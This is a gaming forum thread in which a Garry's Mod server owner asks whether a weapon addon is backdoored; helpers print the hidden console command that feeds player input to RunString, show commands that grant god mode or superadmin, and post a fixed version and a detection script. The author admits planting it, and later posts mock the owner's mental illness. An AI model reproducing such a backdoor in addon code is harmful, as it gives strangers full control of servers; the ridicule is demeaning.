Is this SWEP a trojan/backdoor? I think I got hacked - help please.
[B]Proof[/B]: [url]http://facepunch.com/showthread.php?t=1416566&p=45650165&viewfull=1#post45650165[/url]
[B]Original post:[/B]
Not sure if this is the right place to post this but here goes.
I run a DarkRP server and needed a SWEP coded. The goal of the swep was that the "Imam" job had it, and it was a melee-range weapon that converted other players to the "Muslim" job. A well-known LUA coder (who I will not identify) showed up on my server one day offering to code it for free. I skimmed the code and installed it.
SWEP lua code: [url]http://pastebin.com/rZ8txJwV[/url]
However, after I installed it, I started having very strange errors. First, a door kept opening by itself after I locked it, then half the players on the server randomly had god mode, then I was demoted from superadmin to user, then someone deleted the "Player" entity and I had to restart the server...
Every single time these "glitches" happened, the person who coded the SWEP was present on the server, and they only started after I installed the SWEP.
ULX/DarkRP/FAdmin logs turn up nothing and the "Last Modified" dates on the FTP lead me to believe the hacker can't access the FTP. Additionally all the problems seem to stop when I restart the map.
I noticed a few lines looked strange, specifically that the SWEP looks for a SteamID and there's a "gsub" string. I don't know what this means though.
My question is: is this actually a trojan/backdoor, and if so, [B]what is the extent of the damage? What can I do to stop it?[/B]
Any help would be appreciated.
[Del]There's nothing wrong with that SWEP. It's pretty inefficient with the lag compensation and a concommand for conversion, but no backdoors.[/del]
It contains a backdoor - it will run any code in the first argument of the console command ( "Entity(x):GodEnable()" or "Entity(x):SetUserGroup("superadmin")" or "Entity(1):Remove()" ). You don't have a trojan or anything, this is just a junky weapon. If you like everything else about it, you can use this instead, which will do the same thing without that concommand.
[code]AddCSLuaFile()

SWEP.PrintName = "Quran"
SWEP.Instructions = "Read."
SWEP.Contact = "(redacted)"
SWEP.Purpose = "Convert others."
SWEP.AdminSpawnable = true
SWEP.Spawnable = false
SWEP.ViewModelFOV = 50
SWEP.ViewModel = "models/props_lab/binderredlabel.mdl"
SWEP.WorldModel = "models/weapons/w_pistol.mdl"
SWEP.Slot = 2
SWEP.SlotPos = 2
SWEP.HoldType = "normal"
SWEP.Base = "weapon_base"

function SWEP:Initialize()
    self:SetHoldType(self.HoldType)
end

function SWEP:PrimaryAttack()
    self.Owner:LagCompensation(true)
    if (SERVER and !self.Owner.convertSound) then
        -- Trace 96 units ahead of the owner to find the target player.
        local data = {}
        data.start = self.Owner:GetShootPos()
        data.endpos = data.start + self.Owner:GetAimVector()*96
        data.filter = self.Owner
        local trace = util.TraceLine(data)
        local entity = trace.Entity
        if (IsValid(entity) and entity:IsPlayer()) then
            self.Owner.convertSound = CreateSound(entity, "npc/vort/vort_pain3.wav")
            self.Owner.convertSound:Play()
            local uniqueID = "jaceConverter"..self.Owner:SteamID()
            local i = 1
            -- Re-check the aim every 0.1s; convert on the 50th tick (5 seconds).
            timer.Create(uniqueID, 0.1, 50, function()
                if (IsValid(self.Owner)) then
                    local data = {}
                    data.start = self.Owner:GetShootPos()
                    data.endpos = data.start + self.Owner:GetAimVector()*96
                    data.filter = self.Owner
                    local trace = util.TraceLine(data)
                    -- Abort if the owner is no longer looking at the same player.
                    if (!IsValid(entity) or trace.Entity != entity) then
                        if (self.Owner.convertSound) then
                            self.Owner.convertSound:FadeOut(1)
                            self.Owner.convertSound = nil
                        end
                        return timer.Remove(uniqueID)
                    end
                    if (i == 50) then
                        -- The job change runs server-side here; no console command is involved.
                        if entity.updateJob and entity.changeTeam then
                            entity:changeTeam( TEAM_MUSLIM )
                            entity:ChatPrint("You have been converted to Islam by "..self.Owner:Name())
                        end
                        entity:EmitSound("buttons/bell1.wav")
                        if (self.Owner.convertSound) then
                            self.Owner.convertSound:FadeOut(1)
                            self.Owner.convertSound = nil
                        end
                    end
                    i = i + 1
                end
            end)
        end
    end
    self.Owner:LagCompensation(false)
end

function SWEP:SecondaryAttack()
end

function SWEP:DrawWorldModel()
    if (self.Owner:GetActiveWeapon() == self) then
        if (!IsValid(self.FakeModel)) then
            self.FakeModel = ClientsideModel(self.ViewModel, RENDERGROUP_BOTH)
            self.FakeModel:SetParent(self)
        end
        local index = self:LookupAttachment("muzzle")
        local attachment = self:GetAttachment(index)
        local position, angles = attachment.Pos, attachment.Ang
        angles:RotateAroundAxis(angles:Forward(), 90)
        position = position + angles:Up()*-1 + angles:Forward()*-2
        self.FakeModel:SetPos(position)
        self.FakeModel:SetAngles(angles)
        self.FakeModel:DrawModel()
    end
end

function SWEP:Holster(weapon)
    if (self.FakeModel) then
        self.FakeModel:Remove()
    end
    return true
end

function SWEP:GetViewModelPosition(position, angles)
    angles:RotateAroundAxis(angles:Right(), -25)
    position = position + angles:Forward()*30 + angles:Right()*5
    return position, angles
end[/code]
[QUOTE=code_gs;45650001]There's nothing wrong with that SWEP. It's pretty inefficient with the lag compensation and a concommand for conversion, but no backdoors.[/QUOTE]
What about the gsub and SteamID strings though?
I can't fathom any legitimate reason for those to exist
[QUOTE=NotSoSuper;45650026]The code doesn't look like it had anything malicious, change your rcon password or more preferably disable it, and post which workshop addons you are using.[/QUOTE]
RCon password is set from the command line so I don't think it could be accessed anyway. I don't want to disable it because I don't know any other way to change maps/etc. Kind of new to adminning lol
Addons I'm using off the top of my head:
-DarkRP
-DarkRP Modification
-Gmod Stranded
-M9k Minigun
-Durgz Mod
-Some car mods
-FAdmin
-ULX
-Jihad Bomb
-DarkRP NPC Shops
-some others I probably forgot.
[QUOTE=Kogitsune;45650010]It contains a backdoor - it will run any code in the first argument of the console command ( "Entity(x):GodEnable()" or "Entity(x):SetUserGroup("superadmin")" or "Entity(1):Remove()" ). You don't have a trojan or anything, this is just a junky weapon. If you like everything else about it, you can use this instead, which will do the same thing without that concommand.[/quote]
Could you please point out what bit of code has the backdoor? I'm interested in learning LUA and also really curious as to how he did it. Also I want some proof before I ban the dude lol.
Well...
I'm not that good but I think this is more than enough to prove that it is indeed backdoored.
[URL="http://cloud-4.steampowered.com/ugc/47605214669706743/0AC5BEC8F144E3060E5464E4D2104E07D70720FA/"]Link to image.[/URL]
Obviously the post below mine shows it way more clear ;).
[QUOTE=cooldollars10;45650047]Could you please point out what bit of code has the backdoor? I'm interested in learning LUA and also really curious as to how he did it. Also I want some proof before I ban the dude lol.[/QUOTE]
Sure!
[code]if (SERVER) then
    concommand.Add("convertply", function(p, c, a)
        RunString(("local e = Entity("..p:EntIndex()..") if (IsValid(e) and e.changeTeam and "..teamVar..") then e:changeTeam("..teamVar..", true) end;"..(a[1] or "")):gsub("\\n", "\n"))
    end)
end[/code]
The important part of that is this:
[code];"..(a[1] or "")):gsub("\\n", "\n")[/code]
The first three arguments to a console command are player, command, arguments ( p, c, a in this case ). Since this is a console command anyone can run, all they have to do is type this in their console:
[code]convertply "code they want to run"[/code]
So, if I was Entity 4 and I wanted to give myself god mode, I'd do this:
[code]convertply "Entity(4):GodEnable()"[/code]
I could do the general same thing by putting myself in the superadmin group, giving myself a lot of in-game money, removing players, banning people - anything you can jam inside a console command's length limit.
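Added example (not part of the original thread or of any poster's code): a small Python heuristic for reviewing an addon before installing it, flagging console-command handlers whose argument parameters reach RunString, RunStringEx or CompileString. The function names and the second, benign handler in the sample are constructed for illustration, and the handler body is approximated as the text up to the next concommand.Add.

```python
import re

# Functions that compile or run a Lua string at runtime in Garry's Mod.
SINKS = ("RunString", "RunStringEx", "CompileString")
STRING_LIT = re.compile(r'"(?:\\.|[^"\\\n])*"|\'(?:\\.|[^\'\\\n])*\'')
HANDLER = re.compile(r'concommand\.Add\s*\([^,]*,\s*function\s*\(([^)]*)\)')
SINK_CALL = re.compile(r'\b(%s)\s*\(' % "|".join(SINKS))

# Sample input: the handler quoted in the thread plus a constructed benign one.
SAMPLE = r'''
if (SERVER) then
    concommand.Add("convertply", function(p, c, a)
        RunString(("local e = Entity("..p:EntIndex()..") if (IsValid(e) and e.changeTeam and "..teamVar..") then e:changeTeam("..teamVar..", true) end;"..(a[1] or "")):gsub("\\n", "\n"))
    end)
    concommand.Add("sayhello", function(ply, cmd, args)
        ply:ChatPrint("hello " .. (args[1] or ""))
    end)
end
'''

def call_text(src, open_idx):
    """Return the call's argument text from '(' to its matching ')'."""
    depth = 0
    for i in range(open_idx, len(src)):
        depth += {"(": 1, ")": -1}.get(src[i], 0)
        if depth == 0:
            return src[open_idx:i + 1]
    return src[open_idx:]

def find_arg_exec(lua_source):
    """Flag sink calls that reference a concommand handler's argument params."""
    # Blank out string literals so quotes and parentheses inside them are ignored.
    src = STRING_LIT.sub('""', lua_source)
    handlers = list(HANDLER.finditer(src))
    findings = []
    for n, h in enumerate(handlers):
        params = [p.strip() for p in h.group(1).split(",")]
        tainted = [p for p in params[2:4] if p]  # args table and raw arg string
        # Heuristic: treat text up to the next handler as this handler's body.
        end = handlers[n + 1].start() if n + 1 < len(handlers) else len(src)
        body = src[h.end():end]
        for s in SINK_CALL.finditer(body):
            call = call_text(body, s.end() - 1)
            hits = [t for t in tainted if re.search(r'\b%s\b' % re.escape(t), call)]
            if hits:
                line = src.count("\n", 0, h.end() + s.start()) + 1
                findings.append((line, s.group(1), hits))
    return findings

if __name__ == "__main__":
    for line, sink, params in find_arg_exec(SAMPLE):
        print(f"line {line}: {sink} receives console argument(s) {params}")
```

A hit means the call needs a manual read, not that the addon is malicious; Lua comments and `[[long strings]]` are not parsed.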
Thanks to everyone who helped me fix this problem.
For the record: Chessnut is the one responsible and he's a hacker piece of shit.
[url]http://facepunch.com/showthread.php?t=1404117&p=45624833&viewfull=1#post45624833[/url]
[url]http://facepunch.com/showthread.php?t=1404117&p=45626190&viewfull=1#post45626190[/url]
[url]http://facepunch.com/showthread.php?t=1404117&p=45645207&viewfull=1#post45645207[/url]
For when he deletes the posts:
[IMG]http://i.imgur.com/cwxehvG.png[/IMG]
[IMG]http://i.imgur.com/SbhLwlS.png[/IMG]
[IMG]http://i.imgur.com/Ytdvnqe.png[/IMG]
I'm out. Peace.
too bad i didn't check out the thread originally... lol
also i doubt he'd delete those posts
I didn't even think to look at the concommand arguments; I'm dumb.
-nbjht-
Uh. I don't get it. I thought chessnut was a respectable guy, why would he write back doored code? Or am I missing something and look like an idiot
[QUOTE=cooldollars10;45650165]Thanks to everyone who helped me fix this problem.
For the record: Chessnut is the one responsible and he's a hacker piece of shit.
[url]http://facepunch.com/showthread.php?t=1404117&p=45624833&viewfull=1#post45624833[/url]
[url]http://facepunch.com/showthread.php?t=1404117&p=45626190&viewfull=1#post45626190[/url]
[url]http://facepunch.com/showthread.php?t=1404117&p=45645207&viewfull=1#post45645207[/url]
For when he deletes the posts:
[IMG]http://i.imgur.com/cwxehvG.png[/IMG]
[IMG]http://i.imgur.com/SbhLwlS.png[/IMG]
[IMG]http://i.imgur.com/Ytdvnqe.png[/IMG]
I'm out. Peace.[/QUOTE]
chessnut why are you coding for jace
[QUOTE=CallMePyro;45651259]Uh. I don't get it. I thought chessnut was a respectable guy, why would he write back doored code? Or am I missing something and look like an idiot[/QUOTE]
[URL="http://facepunch.com/showthread.php?t=1404117"]It's a long story, really...[/URL]
Because you idiots don't read the thread and just ruined the fun >:(
[QUOTE=CallMePyro;45651259]Uh. I don't get it. I thought chessnut was a respectable guy, why would he write back doored code? Or am I missing something and look like an idiot[/QUOTE]
Parkourdude91 (The op) is a homophobic, racist, self-proclaimed "ex-marine". He has also abandoned another 20 year old in a war zone for the promise of an Xbox One. The SWEP was simply for fun, but it seems I have stooped to his level. Fun is over I guess.
[editline]10th August 2014[/editline]
Also jace, I don't have a reason to delete my posts :v:
[QUOTE=Chessnut;45651344]Parkourdude91 (The op) is a homophobic, racist, self-proclaimed "ex-marine". He has also abandoned another 20 year old in a war zone for the promise of an Xbox One. The SWEP was simply for fun, but it seems I have stooped to his level. Fun is over I guess.
[editline]10th August 2014[/editline]
Also jace, I don't have a reason to delete my posts :v:[/QUOTE]
Ohhhh the OP is that guy in the video? Damn, I woulda done the same thing.
[QUOTE=Chessnut;45651344]Parkourdude91 (The op) is a homophobic, racist, self-proclaimed "ex-marine". He has also abandoned another 20 year old in a war zone for the promise of an Xbox One. The SWEP was simply for fun, but it seems I have stooped to his level. Fun is over I guess.
[editline]10th August 2014[/editline]
Also jace, I don't have a reason to delete my posts :v:[/QUOTE]
No way. That can't be [URL="http://facepunch.com/showthread.php?t=1404117"]the Parkourdude91[/URL].
[QUOTE=code_gs;45651621]No way. That can't be [URL="http://facepunch.com/showthread.php?t=1404117"]the Parkourdude91[/URL].[/QUOTE]
His FP name certainly fits the description.
Keep in mind this guy also sent his fucking friend to Israel and threatens to cut off the money supply if he doesn't assassinate Gaza's Prime Minister and rescue Tupac.
He hangs out with a 16 year old kid named Tyce and he's 21 years old.
He has some mental problem that allows him to collect bucks from the government.
He was dumb enough to drink vegetable oil to protect himself from the "mind rays" made to take him over and convert him to a Muslim.
He STOLE his mother's car to GO TO THE STORE AND BUY MORE and then shit himself WHILE in the car.
If that doesn't make Jace an idiot, I don't know what will.
EDIT: The vegetable oil was apparently for nerve gas, not mind rays, but same thing.
[QUOTE=Reyjr43;45655711]Keep in mind this guy also sent his fucking friend to Israel and threatens to cut off the money supply if he doesn't assassinate Gaza's Prime Minister and rescue Tupac.
He hangs out with a 16 year old kid named Tyce and he's 21 years old.
He has some mental problem that allows him to collect bucks from the government.
He was dumb enough to drink vegetable oil to protect himself from the "mind rays" made to take him over and convert him to a Muslim.
He STOLE his mother's car to GO TO THE STORE AND BUY MORE and then shit himself WHILE in the car.
If that doesn't make Jace an idiot, I don't know what will.
EDIT: The vegetable oil was apparently for nerve gas, not mind rays, but same thing.[/QUOTE]hahahahahahahah hahahahahhaha hahhahaha hahahah hahahahahahahah. He's definitely an idiot
[B]Edit[/B]
I feel bad for laughing.... He got a mental illness and it's nothing to laugh about.